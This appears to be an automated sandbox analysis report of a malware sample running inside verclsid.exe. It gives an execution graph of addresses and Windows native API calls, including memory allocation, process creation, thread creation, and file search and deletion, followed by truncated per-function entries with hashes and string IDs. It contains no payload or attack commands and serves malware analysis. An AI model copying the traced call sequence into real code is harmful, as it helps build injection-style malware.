                                                                                                                                              execution_graph 100212 2eb0cab 100213 2eb0cbf 100212->100213 100214 2eb0cb3 PostThreadMessageW 100212->100214 100214->100213 99837 2eb6c6a 99838 2eb6c1c 99837->99838 99841 2eb7d80 99838->99841 99840 2eb6c44 99842 2eb7d9d 99841->99842 99848 2ec89c0 99842->99848 99844 2eb7ded 99845 2eb7df4 99844->99845 99853 2ec8aa0 99844->99853 99845->99840 99847 2eb7e1d 99847->99840 99849 2ec8a5b 99848->99849 99850 2ec89eb 99848->99850 99858 4ef2f30 LdrInitializeThunk 99849->99858 99850->99844 99851 2ec8a94 99851->99844 99854 2ec8acf 99853->99854 99855 2ec8b51 99853->99855 99854->99847 99859 4ef2d10 LdrInitializeThunk 99855->99859 99856 2ec8b96 99856->99847 99858->99851 99859->99856 99860 2ebc460 99862 2ebc489 99860->99862 99861 2ebc58d 99862->99861 99863 2ebc533 FindFirstFileW 99862->99863 99863->99861 99865 2ebc54e 99863->99865 99864 2ebc574 FindNextFileW 99864->99865 99866 2ebc586 FindClose 99864->99866 99865->99864 99866->99861 100215 2ebaba0 100220 2eba8b0 100215->100220 100217 2ebabad 100234 2eba530 100217->100234 100219 2ebabc9 100221 2eba8d5 100220->100221 100245 2eb81c0 100221->100245 100224 2ebaa23 100224->100217 100226 2ebaa3a 100226->100217 100227 2ebaa31 100227->100226 100229 2ebab27 100227->100229 100264 2eb9f80 100227->100264 100231 2ebab8a 100229->100231 100273 2eba2f0 100229->100273 100232 2ecb360 RtlFreeHeap 100231->100232 100233 2ebab91 100232->100233 100233->100217 100235 2eba546 100234->100235 100242 2eba551 100234->100242 100236 2ecb440 RtlAllocateHeap 100235->100236 100236->100242 100237 2eba572 100237->100219 100238 2eb81c0 GetFileAttributesW 100238->100242 100239 2eba882 100240 2eba89b 100239->100240 100241 2ecb360 RtlFreeHeap 100239->100241 100240->100219 100241->100240 100242->100237 100242->100238 100242->100239 100243 2eb9f80 RtlFreeHeap 100242->100243 100244 2eba2f0 RtlFreeHeap 100242->100244 100243->100242 100244->100242 100246 2eb81e1 100245->100246 100247 2eb81e8 GetFileAttributesW 100246->100247 100248 2eb81f3 100246->100248 100247->100248 100248->100224 100249 2ec3250 100248->100249 100250 2ec325e 100249->100250 100251 2ec3265 100249->100251 100250->100227 100252 2eb43b0 2 API calls 100251->100252 100253 2ec329a 100252->100253 100254 2ec32a9 100253->100254 100277 2ec2d10 LdrLoadDll LdrLoadDll 100253->100277 100256 2ecb440 RtlAllocateHeap 100254->100256 100260 2ec3454 100254->100260 100257 2ec32c2 100256->100257 100258 2ec344a 100257->100258 100257->100260 100261 2ec32de 100257->100261 100259 2ecb360 RtlFreeHeap 100258->100259 100258->100260 100259->100260 100260->100227 100261->100260 100262 2ecb360 RtlFreeHeap 100261->100262 100263 2ec343e 100262->100263 100263->100227 100265 2eb9fa6 100264->100265 100278 2ebd9d0 100265->100278 100267 2eba018 100269 2eba1a0 100267->100269 100271 2eba036 100267->100271 100268 2eba185 100268->100227 100269->100268 100270 2eb9e40 RtlFreeHeap 100269->100270 100270->100269 100271->100268 100283 2eb9e40 100271->100283 100274 2eba316 100273->100274 100275 2ebd9d0 RtlFreeHeap 100274->100275 100276 2eba39d 100275->100276 100276->100229 100277->100254 100280 2ebd9f4 100278->100280 100279 2ebda01 100279->100267 100280->100279 100281 2ecb360 RtlFreeHeap 100280->100281 100282 2ebda44 100281->100282 100282->100267 100284 2eb9e5d 100283->100284 100287 2ebda60 100284->100287 100286 2eb9f63 100286->100271 100288 2ebda84 100287->100288 100289 2ebdb2e 100288->100289 100290 2ecb360 RtlFreeHeap 100288->100290 100289->100286 100290->100289 99867 2ecc460 99870 2ecb360 99867->99870 99873 2ec9600 99870->99873 99872 2ecb379 99874 2ec961d 99873->99874 99875 2ec962e RtlFreeHeap 99874->99875 99875->99872 100291 2ec58a0 100292 2ec5905 100291->100292 100293 2ec593c 100292->100293 100296 2ec1050 100292->100296 100295 2ec591e 100297 2ec0fef 100296->100297 100298 2ec106b 100296->100298 100299 2ecb2d0 NtAllocateVirtualMemory 100297->100299 100300 2ec1001 100299->100300 100300->100295 100301 2ec1620 100302 2ec163c 100301->100302 100303 2ec1678 100302->100303 100304 2ec1664 100302->100304 100306 2ec9290 NtClose 100303->100306 100305 2ec9290 NtClose 100304->100305 100307 2ec166d 100305->100307 100308 2ec1681 100306->100308 100311 2ecb480 RtlAllocateHeap 100308->100311 100310 2ec168c 100311->100310 99878 2eb9a73 99880 2eb9a7f 99878->99880 99879 2eb9a86 99880->99879 99881 2ecb360 RtlFreeHeap 99880->99881 99881->99879 99882 2eb8671 99883 2eb8681 99882->99883 99885 2eb8631 99883->99885 99886 2eb6f10 99883->99886 99887 2eb6f26 99886->99887 99889 2eb6f5f 99886->99889 99887->99889 99890 2eb6d80 LdrLoadDll LdrLoadDll 99887->99890 99889->99885 99890->99889 99891 2ea9df0 99892 2eaa04b 99891->99892 99894 2eaa2c8 99892->99894 99895 2ecafc0 99892->99895 99896 2ecafe6 99895->99896 99901 2ea4040 99896->99901 99898 2ecaff2 99899 2ecb02b 99898->99899 99904 2ec5510 99898->99904 99899->99894 99908 2eb30d0 99901->99908 99903 2ea404d 99903->99898 99905 2ec5572 99904->99905 99906 2ec557f 99905->99906 99926 2eb1880 99905->99926 99906->99899 99909 2eb30ea 99908->99909 99911 2eb3103 99909->99911 99912 2ec9ce0 99909->99912 99911->99903 99914 2ec9cfa 99912->99914 99913 2ec9d29 99913->99911 99914->99913 99919 2ec88d0 99914->99919 99917 2ecb360 RtlFreeHeap 99918 2ec9da2 99917->99918 99918->99911 99920 2ec88ed 99919->99920 99923 4ef2c0a 99920->99923 99921 2ec8919 99921->99917 99924 4ef2c1f LdrInitializeThunk 99923->99924 99925 4ef2c11 99923->99925 99924->99921 99925->99921 99927 2eb18bb 99926->99927 99942 2eb7ce0 99927->99942 99929 2eb18c3 99940 2eb1ba3 99929->99940 99953 2ecb440 99929->99953 99931 2eb18d9 99932 2ecb440 RtlAllocateHeap 99931->99932 99933 2eb18ea 99932->99933 99934 2ecb440 RtlAllocateHeap 99933->99934 99935 2eb18fb 99934->99935 99941 2eb1992 99935->99941 99967 2eb6880 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99935->99967 99938 2eb1b52 99963 2ec7e50 99938->99963 99940->99906 99956 2eb43b0 99941->99956 99943 2eb7d0c 99942->99943 99968 2eb7bd0 99943->99968 99946 2eb7d39 99950 2eb7d44 99946->99950 99974 2ec9290 99946->99974 99948 2eb7d6d 99948->99929 99949 2eb7d51 99949->99948 99951 2ec9290 NtClose 99949->99951 99950->99929 99952 2eb7d63 99951->99952 99952->99929 99982 2ec95b0 99953->99982 99955 2ecb45b 99955->99931 99958 2eb43d4 99956->99958 99957 2eb43db 99957->99938 99958->99957 99959 2eb43fa 99958->99959 99985 2ecc7e0 LdrLoadDll 99958->99985 99961 2eb4410 LdrLoadDll 99959->99961 99962 2eb4427 99959->99962 99961->99962 99962->99938 99964 2ec7eb2 99963->99964 99966 2ec7ebf 99964->99966 99986 2eb1bc0 99964->99986 99966->99940 99967->99941 99969 2eb7cc6 99968->99969 99970 2eb7bea 99968->99970 99969->99946 99969->99949 99977 2ec8970 99970->99977 99973 2ec9290 NtClose 99973->99969 99975 2ec92aa 99974->99975 99976 2ec92bb NtClose 99975->99976 99976->99950 99978 2ec898a 99977->99978 99981 4ef35c0 LdrInitializeThunk 99978->99981 99979 2eb7cba 99979->99973 99981->99979 99983 2ec95cd 99982->99983 99984 2ec95de RtlAllocateHeap 99983->99984 99984->99955 99985->99959 100002 2eb7fb0 99986->100002 99988 2eb1be0 99995 2eb2137 99988->99995 100006 2ec0fe0 99988->100006 99991 2eb1dfa 100015 2ecc530 99991->100015 99992 2eb1c3e 99992->99995 100010 2ecc400 99992->100010 99995->99966 99996 2eb1e0f 99998 2eb1e5f 99996->99998 100021 2eb06d0 99996->100021 99998->99995 100000 2eb06d0 LdrInitializeThunk 99998->100000 100024 2eb7f50 99998->100024 99999 2eb7f50 LdrInitializeThunk 100001 2eb1fb3 99999->100001 100000->99998 100001->99998 100001->99999 100003 2eb7fbd 100002->100003 100004 2eb7fde SetErrorMode 100003->100004 100005 2eb7fe5 100003->100005 100004->100005 100005->99988 100007 2ec0ff9 100006->100007 100028 2ecb2d0 100007->100028 100009 2ec1001 100009->99992 100011 2ecc416 100010->100011 100012 2ecc410 100010->100012 100013 2ecb440 RtlAllocateHeap 100011->100013 100012->99991 100014 2ecc43c 100013->100014 100014->99991 100016 2ecc4a0 100015->100016 100017 2ecc4fd 100016->100017 100018 2ecb440 RtlAllocateHeap 100016->100018 100017->99996 100019 2ecc4da 100018->100019 100020 2ecb360 RtlFreeHeap 100019->100020 100020->100017 100022 2eb06f2 100021->100022 100035 2ec9510 100021->100035 100022->100001 100025 2eb7f63 100024->100025 100040 2ec87d0 100025->100040 100027 2eb7f8e 100027->99998 100031 2ec93f0 100028->100031 100030 2ecb301 100030->100009 100032 2ec9485 100031->100032 100034 2ec941b 100031->100034 100033 2ec949b NtAllocateVirtualMemory 100032->100033 100033->100030 100034->100030 100036 2ec952d 100035->100036 100039 4ef2c70 LdrInitializeThunk 100036->100039 100037 2ec9555 100037->100022 100039->100037 100041 2ec8851 100040->100041 100043 2ec87fe 100040->100043 100045 4ef2dd0 LdrInitializeThunk 100041->100045 100042 2ec8876 100042->100027 100043->100027 100045->100042 100046 2eb7170 100047 2eb7188 100046->100047 100049 2eb71e2 100046->100049 100047->100049 100050 2ebb0d0 100047->100050 100051 2ebb0f6 100050->100051 100052 2ebb32f 100051->100052 100077 2ec9690 100051->100077 100052->100049 100054 2ebb172 100054->100052 100055 2ecc530 2 API calls 100054->100055 100056 2ebb191 100055->100056 100056->100052 100057 2ebb268 100056->100057 100058 2ec88d0 LdrInitializeThunk 100056->100058 100060 2eb5990 LdrInitializeThunk 100057->100060 100061 2ebb287 100057->100061 100059 2ebb1f3 100058->100059 100059->100057 100062 2ebb1fc 100059->100062 100060->100061 100076 2ebb317 100061->100076 100083 2ec8440 100061->100083 100062->100052 100069 2ebb22e 100062->100069 100071 2ebb250 100062->100071 100080 2eb5990 100062->100080 100063 2eb7f50 LdrInitializeThunk 100067 2ebb25e 100063->100067 100065 2eb7f50 LdrInitializeThunk 100070 2ebb325 100065->100070 100067->100049 100098 2ec4690 LdrInitializeThunk 100069->100098 100070->100049 100071->100063 100072 2ebb2ee 100088 2ec84f0 100072->100088 100074 2ebb308 100093 2ec8650 100074->100093 100076->100065 100078 2ec96aa 100077->100078 100079 2ec96bb CreateProcessInternalW 100078->100079 100079->100054 100081 2ec8aa0 LdrInitializeThunk 100080->100081 100082 2eb59ce 100080->100082 100081->100082 100082->100069 100084 2ec84bd 100083->100084 100085 2ec846b 100083->100085 100099 4ef39b0 LdrInitializeThunk 100084->100099 100085->100072 100086 2ec84e2 100086->100072 100089 2ec851b 100088->100089 100090 2ec856d 100088->100090 100089->100074 100100 4ef4340 LdrInitializeThunk 100090->100100 100091 2ec8592 100091->100074 100094 2ec86cd 100093->100094 100096 2ec867b 100093->100096 100101 4ef2fb0 LdrInitializeThunk 100094->100101 100095 2ec86f2 100095->100076 100096->100076 100098->100071 100099->100086 100100->100091 100101->100095 100102 2ec90f0 100103 2ec919a 100102->100103 100105 2ec911e 100102->100105 100104 2ec91b0 NtReadFile 100103->100104 100106 2ec91f0 100107 2ec9267 100106->100107 100109 2ec921b 100106->100109 100108 2ec927d NtDeleteFile 100107->100108 100317 2ec19b0 100318 2ec19c9 100317->100318 100319 2ec1a14 100318->100319 100322 2ec1a54 100318->100322 100324 2ec1a59 100318->100324 100320 2ecb360 RtlFreeHeap 100319->100320 100321 2ec1a24 100320->100321 100323 2ecb360 RtlFreeHeap 100322->100323 100323->100324 100325 2eb5d35 100326 2eb5d5f 100325->100326 100327 2ec9290 NtClose 100325->100327 100327->100326 100111 2eb2fc3 100112 2eb7bd0 2 API calls 100111->100112 100113 2eb2fd3 100112->100113 100114 2eb2fef 100113->100114 100115 2ec9290 NtClose 100113->100115 100115->100114 100116 2ebf6c0 100117 2ebf724 100116->100117 100145 2eb6120 100117->100145 100119 2ebf85e 100120 2ebf857 100120->100119 100152 2eb6230 100120->100152 100122 2ebfa03 100123 2ebf8da 100123->100122 100124 2ebfa12 100123->100124 100156 2ebf4a0 100123->100156 100126 2ec9290 NtClose 100124->100126 100128 2ebfa1c 100126->100128 100127 2ebf916 100127->100124 100129 2ebf921 100127->100129 100130 2ecb440 RtlAllocateHeap 100129->100130 100131 2ebf94a 100130->100131 100132 2ebf969 100131->100132 100133 2ebf953 100131->100133 100165 2ebf390 CoInitialize 100132->100165 100134 2ec9290 NtClose 100133->100134 100136 2ebf95d 100134->100136 100137 2ebf977 100168 2ec8d50 100137->100168 100139 2ebf9f2 100140 2ec9290 NtClose 100139->100140 100141 2ebf9fc 100140->100141 100142 2ecb360 RtlFreeHeap 100141->100142 100142->100122 100143 2ebf995 100143->100139 100144 2ec8d50 LdrInitializeThunk 100143->100144 100144->100143 100146 2eb6153 100145->100146 100147 2eb6177 100146->100147 100172 2ec8df0 100146->100172 100147->100120 100149 2eb619a 100149->100147 100150 2ec9290 NtClose 100149->100150 100151 2eb621c 100150->100151 100151->100120 100153 2eb6255 100152->100153 100177 2ec8be0 100153->100177 100157 2ebf4bc 100156->100157 100158 2eb43b0 2 API calls 100157->100158 100160 2ebf4da 100158->100160 100159 2ebf4e3 100159->100127 100160->100159 100161 2eb43b0 2 API calls 100160->100161 100162 2ebf5ae 100161->100162 100163 2eb43b0 2 API calls 100162->100163 100164 2ebf608 100162->100164 100163->100164 100164->100127 100167 2ebf3f5 100165->100167 100166 2ebf48b CoUninitialize 100166->100137 100167->100166 100169 2ec8d6a 100168->100169 100182 4ef2ba0 LdrInitializeThunk 100169->100182 100170 2ec8d9a 100170->100143 100173 2ec8e0a 100172->100173 100176 4ef2ca0 LdrInitializeThunk 100173->100176 100174 2ec8e36 100174->100149 100176->100174 100178 2ec8bfa 100177->100178 100181 4ef2c60 LdrInitializeThunk 100178->100181 100179 2eb62c9 100179->100123 100181->100179 100182->100170 100183 2ebffc0 100184 2ebffe3 100183->100184 100185 2eb43b0 2 API calls 100184->100185 100186 2ec0007 100185->100186 100328 2ec8880 100329 2ec889d 100328->100329 100332 4ef2df0 LdrInitializeThunk 100329->100332 100330 2ec88c5 100332->100330 100333 2ec5f80 100334 2ec5fda 100333->100334 100336 2ec5fe7 100334->100336 100337 2ec3970 100334->100337 100338 2ecb2d0 NtAllocateVirtualMemory 100337->100338 100339 2ec39b1 100338->100339 100340 2ec3abe 100339->100340 100341 2eb43b0 2 API calls 100339->100341 100340->100336 100343 2ec39f7 100341->100343 100342 2ec3a40 Sleep 100342->100343 100343->100340 100343->100342 100344 2ec8f80 100345 2ec9037 100344->100345 100347 2ec8faf 100344->100347 100346 2ec904d NtCreateFile 100345->100346 100348 2ec8700 100349 2ec8792 100348->100349 100350 2ec872e 100348->100350 100353 4ef2ee0 LdrInitializeThunk 100349->100353 100351 2ec87c3 100353->100351 100354 2eb261c 100355 2eb6120 2 API calls 100354->100355 100356 2eb2653 100355->100356 100187 2eab3d0 100188 2ecb2d0 NtAllocateVirtualMemory 100187->100188 100189 2eaca41 100187->100189 100188->100189 100357 2ea9d90 100358 2ea9d9f 100357->100358 100359 2ea9de0 100358->100359 100360 2ea9dcd CreateThread 100358->100360 100361 2eb5a10 100362 2eb7f50 LdrInitializeThunk 100361->100362 100364 2eb5a40 100362->100364 100365 2eb5a6c 100364->100365 100366 2eb7ed0 100364->100366 100367 2eb7f14 100366->100367 100368 2eb7f35 100367->100368 100373 2ec85a0 100367->100373 100368->100364 100370 2eb7f25 100371 2eb7f41 100370->100371 100372 2ec9290 NtClose 100370->100372 100371->100364 100372->100368 100374 2ec8620 100373->100374 100376 2ec85ce 100373->100376 100378 4ef4650 LdrInitializeThunk 100374->100378 100375 2ec8645 100375->100370 100376->100370 100378->100375 100379 2eb6f90 100380 2eb6fff 100379->100380 100381 2eb6fac 100379->100381 100383 2eb7137 100380->100383 100390 2eb63b0 NtClose LdrInitializeThunk LdrInitializeThunk 100380->100390 100381->100380 100382 2ec9290 NtClose 100381->100382 100384 2eb6fc7 100382->100384 100389 2eb63b0 NtClose LdrInitializeThunk LdrInitializeThunk 100384->100389 100386 2eb7111 100386->100383 100391 2eb6580 NtClose LdrInitializeThunk LdrInitializeThunk 100386->100391 100389->100380 100390->100386 100391->100383 100190 2ecb050 100191 2ecb05b 100190->100191 100192 2ecb07a 100191->100192 100194 2ec5a00 100191->100194 100195 2ec5a62 100194->100195 100197 2ec5a6f 100195->100197 100198 2eb21b0 100195->100198 100197->100192 100199 2eb2169 100198->100199 100200 2eb21d1 100198->100200 100201 2ec88d0 LdrInitializeThunk 100199->100201 100202 2eb2186 100201->100202 100205 2ec9320 100202->100205 100204 2eb219b 100204->100197 100206 2ec93af 100205->100206 100208 2ec934b 100205->100208 100210 4ef2e80 LdrInitializeThunk 100206->100210 100207 2ec93e0 100207->100204 100208->100204 100210->100207 100211 4ef2ad0 LdrInitializeThunk

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02EA9DF0 Relevance: 26.5, Strings: 21, Instructions: 281COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 26 2ea9df0-2eaa049 27 2eaa04b-2eaa051 26->27 28 2eaa054-2eaa05d 26->28 27->28 29 2eaa06f-2eaa073 28->29 30 2eaa05f-2eaa065 28->30 31 2eaa08e 29->31 32 2eaa075-2eaa08c 29->32 33 2eaa06d 30->33 34 2eaa067-2eaa06a 30->34 35 2eaa095-2eaa09c 31->35 32->29 33->27 34->33 36 2eaa09e-2eaa0cb 35->36 37 2eaa0cd-2eaa0e2 35->37 36->35 38 2eaa0ed-2eaa0f3 37->38 39 2eaa101-2eaa10a 38->39 40 2eaa0f5-2eaa0ff 38->40 41 2eaa110-2eaa117 39->41 42 2eaa1c7-2eaa1ce 39->42 40->38 46 2eaa122-2eaa12b 41->46 44 2eaa1d0-2eaa203 42->44 45 2eaa205-2eaa20c 42->45 44->42 47 2eaa20e-2eaa224 45->47 48 2eaa231-2eaa238 45->48 49 2eaa12d-2eaa140 46->49 50 2eaa142-2eaa15a 46->50 52 2eaa22f 47->52 53 2eaa226-2eaa22c 47->53 54 2eaa243-2eaa249 48->54 49->46 55 2eaa18a-2eaa191 50->55 56 2eaa15c-2eaa163 50->56 52->45 53->52 57 2eaa24b-2eaa25e 54->57 58 2eaa260-2eaa267 54->58 59 2eaa19c-2eaa1a2 55->59 60 2eaa16e-2eaa175 56->60 57->54 63 2eaa31b-2eaa325 58->63 64 2eaa26d-2eaa274 58->64 66 2eaa1b8-2eaa1c2 59->66 67 2eaa1a4-2eaa1b6 59->67 61 2eaa188 60->61 62 2eaa177-2eaa186 60->62 61->42 62->60 69 2eaa27f-2eaa288 64->69 66->39 67->59 71 2eaa28a-2eaa293 69->71 72 2eaa295-2eaa29c 69->72 71->69 74 2eaa2a7-2eaa2b0 72->74 75 2eaa2b2-2eaa2c1 74->75 76 2eaa2c3 call 2ecafc0 74->76 77 2eaa29e-2eaa2a4 75->77 79 2eaa2c8-2eaa2cf 76->79 77->74 80 2eaa2da-2eaa2e0 79->80 81 2eaa2e2-2eaa2ee 80->81 82 2eaa2f0-2eaa2fc 80->82 81->80 82->63 84 2eaa2fe-2eaa319 82->84 84->82
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #I$'O$(e$2Z$9$>t$?$G$NK$R=$Um$W#$\$f$o}$u$yB$z"$5$:$|
                                                                                                                                              • API String ID: 0-534497107
                                                                                                                                              • Opcode ID: d49beeff9db1f877f84ae066d67ef71df962edb1cf7f168b5fa97273dcc1d206
                                                                                                                                              • Instruction ID: 7d807a9539888998b2ba1ea91855e174dfccf1ccda49862b273ec1acb24bd04f
                                                                                                                                              • Opcode Fuzzy Hash: d49beeff9db1f877f84ae066d67ef71df962edb1cf7f168b5fa97273dcc1d206
                                                                                                                                              • Instruction Fuzzy Hash: 1CE1A2B0D45229CFEB24CF94C894BEDBBB2BB44308F2091A9D4096B381D7B56A85CF55
                                                                                                                                              Function 02EBC460 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EBC544
                                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02EBC57F
                                                                                                                                              • FindClose.KERNELBASE(?), ref: 02EBC58A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                              • Opcode ID: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
                                                                                                                                              • Instruction ID: 92c83fb83d2d4af232016296f8097b11ceb666a928a8c7247dc1a0c6466b3845
                                                                                                                                              • Opcode Fuzzy Hash: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
                                                                                                                                              • Instruction Fuzzy Hash: E73187719403087FDB21DFA4CD85FEB77BDEF44748F249459B909AA180DB70AA858BA0
                                                                                                                                              Function 02EC8F80 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtCreateFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?,?,?), ref: 02EC907E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
                                                                                                                                              • Instruction ID: 94ad65029a5f0531445eb344f8d113a26fbc8594ff1d90cdd8bc7c4f949229e6
                                                                                                                                              • Opcode Fuzzy Hash: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
                                                                                                                                              • Instruction Fuzzy Hash: F731C2B5A00248AFDB14DF98D881EEEB7B9AF88314F108219F919A7344D734A911CFA4
                                                                                                                                              Function 02EC90F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtReadFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?), ref: 02EC91D9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
                                                                                                                                              • Instruction ID: 498f67eef12b8aa764c906c1503c00ed3080ecccb607386a92ccded984321378
                                                                                                                                              • Opcode Fuzzy Hash: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
                                                                                                                                              • Instruction Fuzzy Hash: 6C31C4B5A00208AFDB14DF98D841EEFB7B9EF88314F108219F919AB344D774A911CFA5
                                                                                                                                              Function 02EC93F0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(EA1C6576,?,02EC7EBF,00000000,00000004,00003000,?,?,?,?,?,02EC7EBF,02EB1C3E), ref: 02EC94B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                              • Opcode ID: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
                                                                                                                                              • Instruction ID: bec51cee29d40215de4192eaecc427a677ea8a81d2c22360997c59ed94f7385a
                                                                                                                                              • Opcode Fuzzy Hash: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
                                                                                                                                              • Instruction Fuzzy Hash: C921F7B5A00208ABDB14DF98C841FAFB7B9EB88304F108219F918AB240D774A911CFA5
                                                                                                                                              Function 02EC91F0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtDeleteFile.NTDLL(EA1C6576), ref: 02EC9286
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                              • Opcode ID: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
                                                                                                                                              • Instruction ID: 79dff539d31df4af6dea4ca5be7fab89b3e11f9b5aaf03e199f9abf2548bdd8b
                                                                                                                                              • Opcode Fuzzy Hash: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
                                                                                                                                              • Instruction Fuzzy Hash: 5A1151759406086FD620EAA8DC01FEF776DEB85715F10C24DF9586B280E77479028FA5
                                                                                                                                              Function 02EC9290 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EC92C4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                              • Opcode ID: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
                                                                                                                                              • Instruction ID: c020b54524ee68c64c33c0c5c73ef89d6acf6b7fd2e39ec286665d53b62494b7
                                                                                                                                              • Opcode Fuzzy Hash: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
                                                                                                                                              • Instruction Fuzzy Hash: D4E046362506587BD220AA59DC04F9B77ADEBC5724F008059FA08AB241C6B1B9018AE4
                                                                                                                                              Function 04EF4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 4527b5afe9b6be1aa784b84ddcaa3ee7a0869e3bed80dd52f06b41c57205a350
                                                                                                                                              • Instruction ID: dff3fb2b33e0c4c80d1e2d26853657a195898daa5916a80f96c9e03a3f814367
